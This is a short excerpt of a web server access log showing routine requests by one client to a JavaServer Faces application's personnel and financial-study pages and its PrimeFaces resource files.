181.53.14.143 - - [11/Jul/2024:00:59:19 -0500] "POST /sipse/faces/presentacion/financiero/estudioPrevio/personalSolicitado/asociarProfesionPersonalSolicitado.xhtml HTTP/1.1" 200 21235
181.53.14.143 - - [11/Jul/2024:00:59:22 -0500] "POST /sipse/faces/presentacion/financiero/estudioPrevio/personalSolicitado/asociarProfesionPersonalSolicitado.xhtml HTTP/1.1" 200 53164
181.53.14.143 - - [11/Jul/2024:00:59:23 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.14.143 - - [11/Jul/2024:00:59:23 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
181.53.14.143 - - [11/Jul/2024:00:59:23 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.14.143 - - [11/Jul/2024:00:59:23 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.14.143 - - [11/Jul/2024:00:59:23 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.14.143 - - [11/Jul/2024:00:59:23 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.14.143 - - [11/Jul/2024:00:59:23 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.14.143 - - [11/Jul/2024:00:59:25 -0500] "POST /sipse/faces/presentacion/financiero/estudioPrevio/personalSolicitado/personalSolicitadoSolicitudProceso.xhtml HTTP/1.1" 200 36779
181.53.14.143 - - [11/Jul/2024:00:59:26 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.14.143 - - [11/Jul/2024:00:59:26 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
181.53.14.143 - - [11/Jul/2024:00:59:26 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.14.143 - - [11/Jul/2024:00:59:26 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.14.143 - - [11/Jul/2024:00:59:26 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.14.143 - - [11/Jul/2024:00:59:26 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.14.143 - - [11/Jul/2024:00:59:26 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.14.143 - - [11/Jul/2024:00:59:28 -0500] "POST /sipse/faces/presentacion/financiero/estudioPrevio/personalSolicitado/asociarProfesionPersonalSolicitado.xhtml HTTP/1.1" 200 21076
172.22.2.4 - - [11/Jul/2024:00:57:49 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
181.53.14.143 - - [11/Jul/2024:00:59:30 -0500] "POST /sipse/faces/presentacion/financiero/estudioPrevio/personalSolicitado/asociarProfesionPersonalSolicitado.xhtml HTTP/1.1" 200 21211
181.53.14.143 - - [11/Jul/2024:00:59:31 -0500] "POST /sipse/faces/presentacion/financiero/estudioPrevio/personalSolicitado/asociarProfesionPersonalSolicitado.xhtml HTTP/1.1" 200 21215
181.53.14.143 - - [11/Jul/2024:00:59:36 -0500] "POST /sipse/faces/presentacion/financiero/estudioPrevio/personalSolicitado/asociarProfesionPersonalSolicitado.xhtml HTTP/1.1" 200 21318
181.53.14.143 - - [11/Jul/2024:00:59:40 -0500] "POST /sipse/faces/presentacion/financiero/estudioPrevio/personalSolicitado/asociarProfesionPersonalSolicitado.xhtml HTTP/1.1" 200 54437
181.53.14.143 - - [11/Jul/2024:00:59:40 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.14.143 - - [11/Jul/2024:00:59:40 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
181.53.14.143 - - [11/Jul/2024:00:59:40 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.14.143 - - [11/Jul/2024:00:59:40 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.14.143 - - [11/Jul/2024:00:59:40 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.14.143 - - [11/Jul/2024:00:59:40 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.14.143 - - [11/Jul/2024:00:59:40 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.14.143 - - [11/Jul/2024:00:59:47 -0500] "POST /sipse/faces/presentacion/financiero/estudioPrevio/personalSolicitado/personalSolicitadoSolicitudProceso.xhtml HTTP/1.1" 200 36784
181.53.14.143 - - [11/Jul/2024:00:59:47 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
181.53.14.143 - - [11/Jul/2024:00:59:47 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.14.143 - - [11/Jul/2024:00:59:47 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.14.143 - - [11/Jul/2024:00:59:48 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.14.143 - - [11/Jul/2024:00:59:48 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.14.143 - - [11/Jul/2024:00:59:48 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.14.143 - - [11/Jul/2024:00:59:48 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.14.143 - - [11/Jul/2024:00:59:50 -0500] "POST /sipse/faces/presentacion/financiero/estudioPrevio/personalSolicitado/asociarProfesionPersonalSolicitado.xhtml HTTP/1.1" 200 21232
181.53.14.143 - - [11/Jul/2024:00:59:51 -0500] "POST /sipse/faces/presentacion/financiero/estudioPrevio/personalSolicitado/asociarProfesionPersonalSolicitado.xhtml HTTP/1.1" 200 21228
181.53.14.143 - - [11/Jul/2024:00:59:52 -0500] "POST /sipse/faces/presentacion/financiero/estudioPrevio/personalSolicitado/asociarProfesionPersonalSolicitado.xhtml HTTP/1.1" 200 21232
181.53.14.143 - - [11/Jul/2024:00:59:53 -0500] "POST /sipse/faces/presentacion/financiero/estudioPrevio/personalSolicitado/asociarProfesionPersonalSolicitado.xhtml HTTP/1.1" 200 21228
